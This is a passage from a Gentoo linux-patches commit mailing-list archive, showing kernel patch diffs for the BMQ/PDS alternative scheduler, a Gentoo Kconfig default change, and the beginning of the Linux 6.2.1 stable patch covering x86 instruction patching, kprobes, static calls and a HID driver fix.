++#endif
++static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq) {}
+diff --git a/kernel/sched/pelt.c b/kernel/sched/pelt.c
+index 0f310768260c..bd38bf738fe9 100644
+--- a/kernel/sched/pelt.c
++++ b/kernel/sched/pelt.c
+@@ -266,6 +266,7 @@ ___update_load_avg(struct sched_avg *sa, unsigned long load)
+ 	WRITE_ONCE(sa->util_avg, sa->util_sum / divider);
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * sched_entity:
+  *
+@@ -383,8 +384,9 @@ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
+ 
+ 	return 0;
+ }
++#endif
+ 
+-#ifdef CONFIG_SCHED_THERMAL_PRESSURE
++#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
+ /*
+  * thermal:
+  *
+diff --git a/kernel/sched/pelt.h b/kernel/sched/pelt.h
+index 3a0e0dc28721..e8a7d84aa5a5 100644
+--- a/kernel/sched/pelt.h
++++ b/kernel/sched/pelt.h
+@@ -1,13 +1,15 @@
+ #ifdef CONFIG_SMP
+ #include "sched-pelt.h"
+ 
++#ifndef CONFIG_SCHED_ALT
+ int __update_load_avg_blocked_se(u64 now, struct sched_entity *se);
+ int __update_load_avg_se(u64 now, struct cfs_rq *cfs_rq, struct sched_entity *se);
+ int __update_load_avg_cfs_rq(u64 now, struct cfs_rq *cfs_rq);
+ int update_rt_rq_load_avg(u64 now, struct rq *rq, int running);
+ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running);
++#endif
+ 
+-#ifdef CONFIG_SCHED_THERMAL_PRESSURE
++#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
+ int update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity);
+ 
+ static inline u64 thermal_load_avg(struct rq *rq)
+@@ -44,6 +46,7 @@ static inline u32 get_pelt_divider(struct sched_avg *avg)
+ 	return PELT_MIN_DIVIDER + avg->period_contrib;
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline void cfs_se_util_change(struct sched_avg *avg)
+ {
+ 	unsigned int enqueued;
+@@ -180,9 +183,11 @@ static inline u64 cfs_rq_clock_pelt(struct cfs_rq *cfs_rq)
+ 	return rq_clock_pelt(rq_of(cfs_rq));
+ }
+ #endif
++#endif /* CONFIG_SCHED_ALT */
+ 
+ #else
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline int
+ update_cfs_rq_load_avg(u64 now, struct cfs_rq *cfs_rq)
+ {
+@@ -200,6 +205,7 @@ update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
+ {
+ 	return 0;
+ }
++#endif
+ 
+ static inline int
+ update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity)
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index 771f8ddb7053..787a5069d69a 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -5,6 +5,10 @@
+ #ifndef _KERNEL_SCHED_SCHED_H
+ #define _KERNEL_SCHED_SCHED_H
+ 
++#ifdef CONFIG_SCHED_ALT
++#include "alt_sched.h"
++#else
++
+ #include <linux/sched/affinity.h>
+ #include <linux/sched/autogroup.h>
+ #include <linux/sched/cpufreq.h>
+@@ -3261,4 +3265,9 @@ static inline void update_current_exec_runtime(struct task_struct *curr,
+ 	cgroup_account_cputime(curr, delta_exec);
+ }
+ 
++static inline int task_running_nice(struct task_struct *p)
++{
++	return (task_nice(p) > 0);
++}
++#endif /* !CONFIG_SCHED_ALT */
+ #endif /* _KERNEL_SCHED_SCHED_H */
+diff --git a/kernel/sched/stats.c b/kernel/sched/stats.c
+index 857f837f52cb..5486c63e4790 100644
+--- a/kernel/sched/stats.c
++++ b/kernel/sched/stats.c
+@@ -125,8 +125,10 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 	} else {
+ 		struct rq *rq;
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 		struct sched_domain *sd;
+ 		int dcount = 0;
++#endif
+ #endif
+ 		cpu = (unsigned long)(v - 2);
+ 		rq = cpu_rq(cpu);
+@@ -143,6 +145,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 		seq_printf(seq, "\n");
+ 
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 		/* domain-specific stats */
+ 		rcu_read_lock();
+ 		for_each_domain(cpu, sd) {
+@@ -171,6 +174,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 			    sd->ttwu_move_balance);
+ 		}
+ 		rcu_read_unlock();
++#endif
+ #endif
+ 	}
+ 	return 0;
+diff --git a/kernel/sched/stats.h b/kernel/sched/stats.h
+index 38f3698f5e5b..b9d597394316 100644
+--- a/kernel/sched/stats.h
++++ b/kernel/sched/stats.h
+@@ -89,6 +89,7 @@ static inline void rq_sched_info_depart  (struct rq *rq, unsigned long long delt
+ 
+ #endif /* CONFIG_SCHEDSTATS */
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_FAIR_GROUP_SCHED
+ struct sched_entity_stats {
+ 	struct sched_entity     se;
+@@ -105,6 +106,7 @@ __schedstats_from_se(struct sched_entity *se)
+ #endif
+ 	return &task_of(se)->stats;
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_PSI
+ void psi_task_change(struct task_struct *task, int clear, int set);
+diff --git a/kernel/sched/topology.c b/kernel/sched/topology.c
+index 8739c2a5a54e..d8dd6c15eb47 100644
+--- a/kernel/sched/topology.c
++++ b/kernel/sched/topology.c
+@@ -3,6 +3,7 @@
+  * Scheduler topology setup/handling methods
+  */
+ 
++#ifndef CONFIG_SCHED_ALT
+ DEFINE_MUTEX(sched_domains_mutex);
+ 
+ /* Protected by sched_domains_mutex: */
+@@ -1413,8 +1414,10 @@ static void asym_cpu_capacity_scan(void)
+  */
+ 
+ static int default_relax_domain_level = -1;
++#endif /* CONFIG_SCHED_ALT */
+ int sched_domain_level_max;
+ 
++#ifndef CONFIG_SCHED_ALT
+ static int __init setup_relax_domain_level(char *str)
+ {
+ 	if (kstrtoint(str, 0, &default_relax_domain_level))
+@@ -1647,6 +1650,7 @@ sd_init(struct sched_domain_topology_level *tl,
+ 
+ 	return sd;
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ /*
+  * Topology list, bottom-up.
+@@ -1683,6 +1687,7 @@ void set_sched_topology(struct sched_domain_topology_level *tl)
+ 	sched_domain_topology_saved = NULL;
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_NUMA
+ 
+ static const struct cpumask *sd_numa_mask(int cpu)
+@@ -2645,3 +2650,15 @@ void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
+ 	partition_sched_domains_locked(ndoms_new, doms_new, dattr_new);
+ 	mutex_unlock(&sched_domains_mutex);
+ }
++#else /* CONFIG_SCHED_ALT */
++void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
++			     struct sched_domain_attr *dattr_new)
++{}
++
++#ifdef CONFIG_NUMA
++int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
++{
++	return best_mask_cpu(cpu, cpus);
++}
++#endif /* CONFIG_NUMA */
++#endif
+diff --git a/kernel/sysctl.c b/kernel/sysctl.c
+index 137d4abe3eda..6bada3a6d571 100644
+--- a/kernel/sysctl.c
++++ b/kernel/sysctl.c
+@@ -93,6 +93,10 @@ EXPORT_SYMBOL_GPL(sysctl_long_vals);
+ 
+ /* Constants used for minimum and maximum */
+ 
++#ifdef CONFIG_SCHED_ALT
++extern int sched_yield_type;
++#endif
++
+ #ifdef CONFIG_PERF_EVENTS
+ static const int six_hundred_forty_kb = 640 * 1024;
+ #endif
+@@ -1934,6 +1938,17 @@ static struct ctl_table kern_table[] = {
+ 		.proc_handler	= proc_dointvec,
+ 	},
+ #endif
++#ifdef CONFIG_SCHED_ALT
++	{
++		.procname	= "yield_type",
++		.data		= &sched_yield_type,
++		.maxlen		= sizeof (int),
++		.mode		= 0644,
++		.proc_handler	= &proc_dointvec_minmax,
++		.extra1		= SYSCTL_ZERO,
++		.extra2		= SYSCTL_TWO,
++	},
++#endif
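++/*
++ * Exposed as /proc/sys/kernel/yield_type; with the bounds above it
++ * accepts 0, 1 or 2 to select the sched_yield() behaviour of the
++ * alternative schedulers.
++ */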
+ #if defined(CONFIG_S390) && defined(CONFIG_SMP)
+ 	{
+ 		.procname	= "spin_retry",
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 3ae661ab6260..35f0176dcdb0 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -2088,8 +2088,10 @@ long hrtimer_nanosleep(ktime_t rqtp, const enum hrtimer_mode mode,
+ 	int ret = 0;
+ 	u64 slack;
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	slack = current->timer_slack_ns;
+ 	if (dl_task(current) || rt_task(current))
++#endif
+ 		slack = 0;
+ 
+ 	hrtimer_init_sleeper_on_stack(&t, clockid, mode);
+diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
+index cb925e8ef9a8..67d823510f5c 100644
+--- a/kernel/time/posix-cpu-timers.c
++++ b/kernel/time/posix-cpu-timers.c
+@@ -223,7 +223,7 @@ static void task_sample_cputime(struct task_struct *p, u64 *samples)
+ 	u64 stime, utime;
+ 
+ 	task_cputime(p, &utime, &stime);
+-	store_samples(samples, stime, utime, p->se.sum_exec_runtime);
++	store_samples(samples, stime, utime, tsk_seruntime(p));
+ }
+ 
+ static void proc_sample_cputime_atomic(struct task_cputime_atomic *at,
+@@ -866,6 +866,7 @@ static void collect_posix_cputimers(struct posix_cputimers *pct, u64 *samples,
+ 	}
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline void check_dl_overrun(struct task_struct *tsk)
+ {
+ 	if (tsk->dl.dl_overrun) {
+@@ -873,6 +874,7 @@ static inline void check_dl_overrun(struct task_struct *tsk)
+ 		send_signal_locked(SIGXCPU, SEND_SIG_PRIV, tsk, PIDTYPE_TGID);
+ 	}
+ }
++#endif
+ 
+ static bool check_rlimit(u64 time, u64 limit, int signo, bool rt, bool hard)
+ {
+@@ -900,8 +902,10 @@ static void check_thread_timers(struct task_struct *tsk,
+ 	u64 samples[CPUCLOCK_MAX];
+ 	unsigned long soft;
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	if (dl_task(tsk))
+ 		check_dl_overrun(tsk);
++#endif
+ 
+ 	if (expiry_cache_is_inactive(pct))
+ 		return;
+@@ -915,7 +919,7 @@ static void check_thread_timers(struct task_struct *tsk,
+ 	soft = task_rlimit(tsk, RLIMIT_RTTIME);
+ 	if (soft != RLIM_INFINITY) {
+ 		/* Task RT timeout is accounted in jiffies. RTTIME is usec */
+-		unsigned long rttime = tsk->rt.timeout * (USEC_PER_SEC / HZ);
++		unsigned long rttime = tsk_rttimeout(tsk) * (USEC_PER_SEC / HZ);
+ 		unsigned long hard = task_rlimit_max(tsk, RLIMIT_RTTIME);
+ 
+ 		/* At the hard limit, send SIGKILL. No further action. */
+@@ -1151,8 +1155,10 @@ static inline bool fastpath_timer_check(struct task_struct *tsk)
+ 			return true;
+ 	}
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	if (dl_task(tsk) && tsk->dl.dl_overrun)
+ 		return true;
++#endif
+ 
+ 	return false;
+ }
+diff --git a/kernel/trace/trace_selftest.c b/kernel/trace/trace_selftest.c
+index ff0536cea968..ce266990006d 100644
+--- a/kernel/trace/trace_selftest.c
++++ b/kernel/trace/trace_selftest.c
+@@ -1150,10 +1150,15 @@ static int trace_wakeup_test_thread(void *data)
+ {
+ 	/* Make this a -deadline thread */
+ 	static const struct sched_attr attr = {
++#ifdef CONFIG_SCHED_ALT
++		/* No deadline on BMQ/PDS, use RR */
++		.sched_policy = SCHED_RR,
++#else
+ 		.sched_policy = SCHED_DEADLINE,
+ 		.sched_runtime = 100000ULL,
+ 		.sched_deadline = 10000000ULL,
+ 		.sched_period = 10000000ULL
++#endif
+ 	};
+ 	struct wakeup_test_data *x = data;
+ 

diff --git a/5021_BMQ-and-PDS-gentoo-defaults.patch b/5021_BMQ-and-PDS-gentoo-defaults.patch
new file mode 100644
index 00000000..6dc48eec
--- /dev/null
+++ b/5021_BMQ-and-PDS-gentoo-defaults.patch
@@ -0,0 +1,13 @@
+--- a/init/Kconfig	2023-02-13 08:16:09.534315265 -0500
++++ b/init/Kconfig	2023-02-13 08:17:24.130237204 -0500
+@@ -867,8 +867,9 @@ config UCLAMP_BUCKETS_COUNT
+ 	  If in doubt, use the default value.
+ 
+ menuconfig SCHED_ALT
++	depends on X86_64
+ 	bool "Alternative CPU Schedulers"
+-	default y
++	default n
+ 	help
+ 	  This feature enables the alternative CPU schedulers.
+ 


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2-2 commit in: /
@ 2023-02-27  3:48 Alice Ferrazzi
  2023-02-25 11:14 ` [gentoo-commits] proj/linux-patches:6.2 " Alice Ferrazzi
  0 siblings, 1 reply; 30+ messages in thread
From: Alice Ferrazzi @ 2023-02-27  3:48 UTC (permalink / raw
  To: gentoo-commits

commit:     917cccf0b0bf4e9bcf4d5a97c9339c82d3236238
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Sat Feb 25 10:58:09 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Sat Feb 25 11:14:38 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=917cccf0

Linux patch 6.2.1

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README            |   4 +
 1000_linux-6.2.1.patch | 552 +++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 556 insertions(+)

diff --git a/0000_README b/0000_README
index 8bb95e22..46624397 100644
--- a/0000_README
+++ b/0000_README
@@ -43,6 +43,10 @@ EXPERIMENTAL
 Individual Patch Descriptions:
 --------------------------------------------------------------------------
 
+Patch:  1000_linux-6.2.1.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.1
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1000_linux-6.2.1.patch b/1000_linux-6.2.1.patch
new file mode 100644
index 00000000..5ca655c1
--- /dev/null
+++ b/1000_linux-6.2.1.patch
@@ -0,0 +1,552 @@
+diff --git a/MAINTAINERS b/MAINTAINERS
+index 135d93368d36e..f77188f30210f 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -3515,7 +3515,7 @@ F:	drivers/net/ieee802154/atusb.h
+ AUDIT SUBSYSTEM
+ M:	Paul Moore <paul@paul-moore.com>
+ M:	Eric Paris <eparis@redhat.com>
+-L:	linux-audit@redhat.com (moderated for non-subscribers)
++L:	audit@vger.kernel.org
+ S:	Supported
+ W:	https://github.com/linux-audit
+ T:	git git://git.kernel.org/pub/scm/linux/kernel/git/pcmoore/audit.git
+diff --git a/Makefile b/Makefile
+index 3f6628780eb21..f26824f367a99 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 0
++SUBLEVEL = 1
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/x86/include/asm/text-patching.h b/arch/x86/include/asm/text-patching.h
+index f4b87f08f5c50..29832c338cdc5 100644
+--- a/arch/x86/include/asm/text-patching.h
++++ b/arch/x86/include/asm/text-patching.h
+@@ -184,6 +184,37 @@ void int3_emulate_ret(struct pt_regs *regs)
+ 	unsigned long ip = int3_emulate_pop(regs);
+ 	int3_emulate_jmp(regs, ip);
+ }
++
++static __always_inline
++void int3_emulate_jcc(struct pt_regs *regs, u8 cc, unsigned long ip, unsigned long disp)
++{
++	static const unsigned long jcc_mask[6] = {
++		[0] = X86_EFLAGS_OF,
++		[1] = X86_EFLAGS_CF,
++		[2] = X86_EFLAGS_ZF,
++		[3] = X86_EFLAGS_CF | X86_EFLAGS_ZF,
++		[4] = X86_EFLAGS_SF,
++		[5] = X86_EFLAGS_PF,
++	};
++
++	bool invert = cc & 1;
++	bool match;
++
++	if (cc < 0xc) {
++		match = regs->flags & jcc_mask[cc >> 1];
++	} else {
++		match = ((regs->flags & X86_EFLAGS_SF) >> X86_EFLAGS_SF_BIT) ^
++			((regs->flags & X86_EFLAGS_OF) >> X86_EFLAGS_OF_BIT);
++		if (cc >= 0xe)
++			match = match || (regs->flags & X86_EFLAGS_ZF);
++	}
++
++	if ((match && !invert) || (!match && invert))
++		ip += disp;
++
++	int3_emulate_jmp(regs, ip);
++}
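++
++/*
++ * Rough worked example: cc == 0x4 (JE/JZ) tests X86_EFLAGS_ZF via
++ * jcc_mask[2]; cc == 0x5 (JNE/JNZ) is the same test with the low
++ * "invert" bit set, so the jump is taken when ZF is clear.
++ */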
++
+ #endif /* !CONFIG_UML_X86 */
+ 
+ #endif /* _ASM_X86_TEXT_PATCHING_H */
+diff --git a/arch/x86/kernel/alternative.c b/arch/x86/kernel/alternative.c
+index 7d8c3cbde3685..81381a0194f39 100644
+--- a/arch/x86/kernel/alternative.c
++++ b/arch/x86/kernel/alternative.c
+@@ -340,6 +340,12 @@ next:
+ 	}
+ }
+ 
++static inline bool is_jcc32(struct insn *insn)
++{
++	/* Jcc.d32 second opcode byte is in the range: 0x80-0x8f */
++	return insn->opcode.bytes[0] == 0x0f && (insn->opcode.bytes[1] & 0xf0) == 0x80;
++}
++
+ #if defined(CONFIG_RETPOLINE) && defined(CONFIG_OBJTOOL)
+ 
+ /*
+@@ -378,12 +384,6 @@ static int emit_indirect(int op, int reg, u8 *bytes)
+ 	return i;
+ }
+ 
+-static inline bool is_jcc32(struct insn *insn)
+-{
+-	/* Jcc.d32 second opcode byte is in the range: 0x80-0x8f */
+-	return insn->opcode.bytes[0] == 0x0f && (insn->opcode.bytes[1] & 0xf0) == 0x80;
+-}
+-
+ static int emit_call_track_retpoline(void *addr, struct insn *insn, int reg, u8 *bytes)
+ {
+ 	u8 op = insn->opcode.bytes[0];
+@@ -1772,6 +1772,11 @@ void text_poke_sync(void)
+ 	on_each_cpu(do_sync_core, NULL, 1);
+ }
+ 
++/*
++ * NOTE: crazy scheme to allow patching Jcc.d32 but not increase the size of
++ * this thing. When len == 6 everything is prefixed with 0x0f and we map
++ * opcode to Jcc.d8, using len to distinguish.
++ */
+ struct text_poke_loc {
+ 	/* addr := _stext + rel_addr */
+ 	s32 rel_addr;
+@@ -1893,6 +1898,10 @@ noinstr int poke_int3_handler(struct pt_regs *regs)
+ 		int3_emulate_jmp(regs, (long)ip + tp->disp);
+ 		break;
+ 
++	case 0x70 ... 0x7f: /* Jcc */
++		int3_emulate_jcc(regs, tp->opcode & 0xf, (long)ip, tp->disp);
++		break;
++
+ 	default:
+ 		BUG();
+ 	}
+@@ -1966,16 +1975,26 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 	 * Second step: update all but the first byte of the patched range.
+ 	 */
+ 	for (do_sync = 0, i = 0; i < nr_entries; i++) {
+-		u8 old[POKE_MAX_OPCODE_SIZE] = { tp[i].old, };
++		u8 old[POKE_MAX_OPCODE_SIZE+1] = { tp[i].old, };
++		u8 _new[POKE_MAX_OPCODE_SIZE+1];
++		const u8 *new = tp[i].text;
+ 		int len = tp[i].len;
+ 
+ 		if (len - INT3_INSN_SIZE > 0) {
+ 			memcpy(old + INT3_INSN_SIZE,
+ 			       text_poke_addr(&tp[i]) + INT3_INSN_SIZE,
+ 			       len - INT3_INSN_SIZE);
++
++			if (len == 6) {
++				_new[0] = 0x0f;
++				memcpy(_new + 1, new, 5);
++				new = _new;
++			}
++
+ 			text_poke(text_poke_addr(&tp[i]) + INT3_INSN_SIZE,
+-				  (const char *)tp[i].text + INT3_INSN_SIZE,
++				  new + INT3_INSN_SIZE,
+ 				  len - INT3_INSN_SIZE);
++
+ 			do_sync++;
+ 		}
+ 
+@@ -2003,8 +2022,7 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 		 * The old instruction is recorded so that the event can be
+ 		 * processed forwards or backwards.
+ 		 */
+-		perf_event_text_poke(text_poke_addr(&tp[i]), old, len,
+-				     tp[i].text, len);
++		perf_event_text_poke(text_poke_addr(&tp[i]), old, len, new, len);
+ 	}
+ 
+ 	if (do_sync) {
+@@ -2021,10 +2039,15 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 	 * replacing opcode.
+ 	 */
+ 	for (do_sync = 0, i = 0; i < nr_entries; i++) {
+-		if (tp[i].text[0] == INT3_INSN_OPCODE)
++		u8 byte = tp[i].text[0];
++
++		if (tp[i].len == 6)
++			byte = 0x0f;
++
++		if (byte == INT3_INSN_OPCODE)
+ 			continue;
+ 
+-		text_poke(text_poke_addr(&tp[i]), tp[i].text, INT3_INSN_SIZE);
++		text_poke(text_poke_addr(&tp[i]), &byte, INT3_INSN_SIZE);
+ 		do_sync++;
+ 	}
+ 
+@@ -2042,9 +2065,11 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 			       const void *opcode, size_t len, const void *emulate)
+ {
+ 	struct insn insn;
+-	int ret, i;
++	int ret, i = 0;
+ 
+-	memcpy((void *)tp->text, opcode, len);
++	if (len == 6)
++		i = 1;
++	memcpy((void *)tp->text, opcode+i, len-i);
+ 	if (!emulate)
+ 		emulate = opcode;
+ 
+@@ -2055,6 +2080,13 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 	tp->len = len;
+ 	tp->opcode = insn.opcode.bytes[0];
+ 
++	if (is_jcc32(&insn)) {
++		/*
++		 * Map Jcc.d32 onto Jcc.d8 and use len to distinguish.
++		 */
++		tp->opcode = insn.opcode.bytes[1] - 0x10;
++	}
++
+ 	switch (tp->opcode) {
+ 	case RET_INSN_OPCODE:
+ 	case JMP32_INSN_OPCODE:
+@@ -2071,7 +2103,6 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 		BUG_ON(len != insn.length);
+ 	}
+ 
+-
+ 	switch (tp->opcode) {
+ 	case INT3_INSN_OPCODE:
+ 	case RET_INSN_OPCODE:
+@@ -2080,6 +2111,7 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 	case CALL_INSN_OPCODE:
+ 	case JMP32_INSN_OPCODE:
+ 	case JMP8_INSN_OPCODE:
++	case 0x70 ... 0x7f: /* Jcc */
+ 		tp->disp = insn.immediate.value;
+ 		break;
+ 
+diff --git a/arch/x86/kernel/kprobes/core.c b/arch/x86/kernel/kprobes/core.c
+index 695873c0f50b5..0ce969ae250f7 100644
+--- a/arch/x86/kernel/kprobes/core.c
++++ b/arch/x86/kernel/kprobes/core.c
+@@ -464,50 +464,26 @@ static void kprobe_emulate_call(struct kprobe *p, struct pt_regs *regs)
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_call);
+ 
+-static nokprobe_inline
+-void __kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs, bool cond)
++static void kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs)
+ {
+ 	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 
+-	if (cond)
+-		ip += p->ainsn.rel32;
++	ip += p->ainsn.rel32;
+ 	int3_emulate_jmp(regs, ip);
+ }
+-
+-static void kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs)
+-{
+-	__kprobe_emulate_jmp(p, regs, true);
+-}
+ NOKPROBE_SYMBOL(kprobe_emulate_jmp);
+ 
+-static const unsigned long jcc_mask[6] = {
+-	[0] = X86_EFLAGS_OF,
+-	[1] = X86_EFLAGS_CF,
+-	[2] = X86_EFLAGS_ZF,
+-	[3] = X86_EFLAGS_CF | X86_EFLAGS_ZF,
+-	[4] = X86_EFLAGS_SF,
+-	[5] = X86_EFLAGS_PF,
+-};
+-
+ static void kprobe_emulate_jcc(struct kprobe *p, struct pt_regs *regs)
+ {
+-	bool invert = p->ainsn.jcc.type & 1;
+-	bool match;
++	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 
+-	if (p->ainsn.jcc.type < 0xc) {
+-		match = regs->flags & jcc_mask[p->ainsn.jcc.type >> 1];
+-	} else {
+-		match = ((regs->flags & X86_EFLAGS_SF) >> X86_EFLAGS_SF_BIT) ^
+-			((regs->flags & X86_EFLAGS_OF) >> X86_EFLAGS_OF_BIT);
+-		if (p->ainsn.jcc.type >= 0xe)
+-			match = match || (regs->flags & X86_EFLAGS_ZF);
+-	}
+-	__kprobe_emulate_jmp(p, regs, (match && !invert) || (!match && invert));
++	int3_emulate_jcc(regs, p->ainsn.jcc.type, ip, p->ainsn.rel32);
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_jcc);
+ 
+ static void kprobe_emulate_loop(struct kprobe *p, struct pt_regs *regs)
+ {
++	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 	bool match;
+ 
+ 	if (p->ainsn.loop.type != 3) {	/* LOOP* */
+@@ -535,7 +511,9 @@ static void kprobe_emulate_loop(struct kprobe *p, struct pt_regs *regs)
+ 	else if (p->ainsn.loop.type == 1)	/* LOOPE */
+ 		match = match && (regs->flags & X86_EFLAGS_ZF);
+ 
+-	__kprobe_emulate_jmp(p, regs, match);
++	if (match)
++		ip += p->ainsn.rel32;
++	int3_emulate_jmp(regs, ip);
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_loop);
+ 
+diff --git a/arch/x86/kernel/static_call.c b/arch/x86/kernel/static_call.c
+index 2ebc338980bcd..b70670a985978 100644
+--- a/arch/x86/kernel/static_call.c
++++ b/arch/x86/kernel/static_call.c
+@@ -9,6 +9,7 @@ enum insn_type {
+ 	NOP = 1,  /* site cond-call */
+ 	JMP = 2,  /* tramp / site tail-call */
+ 	RET = 3,  /* tramp / site cond-tail-call */
++	JCC = 4,
+ };
+ 
+ /*
+@@ -25,12 +26,40 @@ static const u8 xor5rax[] = { 0x2e, 0x2e, 0x2e, 0x31, 0xc0 };
+ 
+ static const u8 retinsn[] = { RET_INSN_OPCODE, 0xcc, 0xcc, 0xcc, 0xcc };
+ 
++static u8 __is_Jcc(u8 *insn) /* Jcc.d32 */
++{
++	u8 ret = 0;
++
++	if (insn[0] == 0x0f) {
++		u8 tmp = insn[1];
++		if ((tmp & 0xf0) == 0x80)
++			ret = tmp;
++	}
++
++	return ret;
++}
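++
++/*
++ * Worked example: the byte pair 0x0f 0x84 (JE rel32) returns 0x84,
++ * while a plain 0xe9 (JMP rel32) fails the 0x0f check and returns 0.
++ */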
++
++extern void __static_call_return(void);
++
++asm (".global __static_call_return\n\t"
++     ".type __static_call_return, @function\n\t"
++     ASM_FUNC_ALIGN "\n\t"
++     "__static_call_return:\n\t"
++     ANNOTATE_NOENDBR
++     ANNOTATE_RETPOLINE_SAFE
++     "ret; int3\n\t"
++     ".size __static_call_return, . - __static_call_return \n\t");
++
+ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 					  void *func, bool modinit)
+ {
+ 	const void *emulate = NULL;
+ 	int size = CALL_INSN_SIZE;
+ 	const void *code;
++	u8 op, buf[6];
++
++	if ((type == JMP || type == RET) && (op = __is_Jcc(insn)))
++		type = JCC;
+ 
+ 	switch (type) {
+ 	case CALL:
+@@ -57,6 +86,20 @@ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 		else
+ 			code = &retinsn;
+ 		break;
++
++	case JCC:
++		if (!func) {
++			func = __static_call_return;
++			if (cpu_feature_enabled(X86_FEATURE_RETHUNK))
++				func = x86_return_thunk;
++		}
++
++		buf[0] = 0x0f;
++		__text_gen_insn(buf+1, op, insn+1, func, 5);
++		code = buf;
++		size = 6;
++
++		break;
+ 	}
+ 
+ 	if (memcmp(insn, code, size) == 0)
+@@ -68,9 +111,9 @@ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 	text_poke_bp(insn, code, size, emulate);
+ }
+ 
+-static void __static_call_validate(void *insn, bool tail, bool tramp)
++static void __static_call_validate(u8 *insn, bool tail, bool tramp)
+ {
+-	u8 opcode = *(u8 *)insn;
++	u8 opcode = insn[0];
+ 
+ 	if (tramp && memcmp(insn+5, tramp_ud, 3)) {
+ 		pr_err("trampoline signature fail");
+@@ -79,7 +122,8 @@ static void __static_call_validate(void *insn, bool tail, bool tramp)
+ 
+ 	if (tail) {
+ 		if (opcode == JMP32_INSN_OPCODE ||
+-		    opcode == RET_INSN_OPCODE)
++		    opcode == RET_INSN_OPCODE ||
++		    __is_Jcc(insn))
+ 			return;
+ 	} else {
+ 		if (opcode == CALL_INSN_OPCODE ||
+diff --git a/drivers/hid/hid-mcp2221.c b/drivers/hid/hid-mcp2221.c
+index e61dd039354b8..f74a977cf8f87 100644
+--- a/drivers/hid/hid-mcp2221.c
++++ b/drivers/hid/hid-mcp2221.c
+@@ -922,6 +922,9 @@ static void mcp2221_hid_unregister(void *ptr)
+ /* This is needed to be sure hid_hw_stop() isn't called twice by the subsystem */
+ static void mcp2221_remove(struct hid_device *hdev)
+ {
++	struct mcp2221 *mcp = hid_get_drvdata(hdev);
++
++	cancel_delayed_work_sync(&mcp->init_work);
+ }
+ 
+ #if IS_REACHABLE(CONFIG_IIO)
+diff --git a/drivers/net/wireless/marvell/mwifiex/sdio.c b/drivers/net/wireless/marvell/mwifiex/sdio.c
